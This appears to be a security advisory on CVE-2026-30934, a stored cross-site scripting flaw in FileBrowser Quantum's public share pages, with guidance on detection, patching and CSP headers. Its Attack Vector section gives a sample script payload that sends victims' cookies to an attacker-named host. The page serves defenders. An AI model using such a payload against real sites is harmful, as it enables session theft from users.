CVE-2026-30934 Overview
CVE-2026-30934 is a Stored Cross-Site Scripting (XSS) vulnerability affecting FileBrowser Quantum, a free, self-hosted, web-based file manager. The vulnerability exists in share metadata fields such as title and description, which are rendered into HTML on the public share URL (/public/share/<hash>) without proper context-aware escaping. This flaw allows attackers to inject malicious scripts that execute when victims visit a crafted share URL.
The root cause stems from the server's use of Go's text/template instead of html/template for rendering share pages, bypassing automatic HTML escaping mechanisms and enabling script execution in the victim's browser context.
Critical Impact
Authenticated attackers can execute arbitrary JavaScript in the browsers of users who access shared file links, potentially leading to session hijacking, credential theft, or further malware distribution.
Affected Products
- FileBrowser Quantum versions prior to 1.3.1-beta
- FileBrowser Quantum versions prior to 1.2.2-stable
Discovery Timeline
- 2026-03-10 - CVE-2026-30934 published to NVD
- 2026-03-11 - Last updated in NVD database
Technical Details for CVE-2026-30934
Vulnerability Analysis
This Stored XSS vulnerability (CWE-79) allows authenticated users with share creation privileges to inject malicious JavaScript into share metadata fields. The attack is network-based and requires low privileges—any authenticated user capable of creating file shares can exploit it. However, successful exploitation requires user interaction, specifically a victim visiting the malicious share URL.
The scope of this vulnerability is particularly concerning because it affects a changed scope: the injected script executes in the context of any victim's browser session, not the attacker's. This enables cross-user attacks where the attacker can steal session tokens, redirect users to phishing pages, or perform actions on behalf of the victim within the FileBrowser Quantum application.
Root Cause
The vulnerability originates from an insecure template rendering implementation in FileBrowser Quantum's Go codebase. The application uses Go's text/template package to render share pages instead of the html/template package. While text/template provides general-purpose text templating, it does not perform HTML-aware contextual escaping. In contrast, html/template automatically escapes content based on the HTML context (attributes, script blocks, CSS, etc.), preventing XSS attacks by default.
When share metadata (title, description) containing HTML or JavaScript is rendered into the /public/share/<hash> page, the text/template engine outputs the content verbatim, allowing any embedded <script> tags or event handlers to execute.
Attack Vector
The attack requires an authenticated user to create or modify a file share with malicious JavaScript embedded in metadata fields. When an unauthenticated or authenticated victim navigates to the public share URL, the injected script executes in their browser.
A typical attack scenario involves an attacker setting a share title or description to contain JavaScript code such as <script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>. When victims access the share link, this script executes, exfiltrating their session cookies to the attacker's server.
The stored nature of this XSS makes it particularly dangerous, as the malicious payload persists on the server and affects all users who visit the compromised share link. For detailed technical analysis, refer to the GitHub Security Advisory GHSA-r633-fcgp-m532.
Detection Methods for CVE-2026-30934
Indicators of Compromise
- Presence of HTML tags or JavaScript in share metadata fields (title, description) in the FileBrowser Quantum database
- Unusual outbound network requests originating from users' browsers after visiting share URLs
- Reports from users about unexpected redirects or behavior when accessing shared file links
- Server logs showing access to /public/share/<hash> endpoints followed by unusual client-side activity
Detection Strategies
- Review existing share metadata in the FileBrowser Quantum database for suspicious HTML or script content
- Implement Content Security Policy (CSP) headers to detect and block inline script execution attempts
- Monitor web application firewall (WAF) logs for XSS patterns in requests to share-related endpoints
- Deploy browser-based monitoring for exfiltration attempts via document.cookie access
Monitoring Recommendations
- Enable verbose logging for share creation and modification operations
- Set up alerts for share metadata containing HTML special characters (<, >, ", ', &)
- Monitor for unusual patterns in share access, particularly shares with low user creation but high view counts
- Implement real-time browser telemetry if available to detect script injection behavior
How to Mitigate CVE-2026-30934
Immediate Actions Required
- Upgrade FileBrowser Quantum to version 1.2.2-stable or 1.3.1-beta immediately
- Audit existing shares for potentially malicious metadata content and sanitize or remove compromised entries
- Implement Content Security Policy (CSP) headers to mitigate impact while patching is in progress
- Temporarily disable public share functionality if immediate patching is not feasible
Patch Information
The FileBrowser Quantum development team has addressed this vulnerability in two releases:
- Stable Release: Version 1.2.2-stable - Recommended for production environments
- Beta Release: Version 1.3.1-beta - Includes additional features alongside the security fix
The patch replaces the use of text/template with html/template for rendering share pages, ensuring proper context-aware HTML escaping of all user-supplied content.
Workarounds
- Deploy a reverse proxy with XSS filtering rules in front of FileBrowser Quantum
- Implement server-side input validation to strip HTML tags from share metadata fields
- Add Content-Security-Policy headers to restrict inline script execution: Content-Security-Policy: script-src 'self'
- Restrict share creation privileges to trusted users only until patching is complete
# Example nginx configuration to add CSP headers
location / {
add_header Content-Security-Policy "script-src 'self'; object-src 'none';" always;
add_header X-Content-Type-Options "nosniff" always;
add_header X-XSS-Protection "1; mode=block" always;
proxy_pass http://filebrowser:8080;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
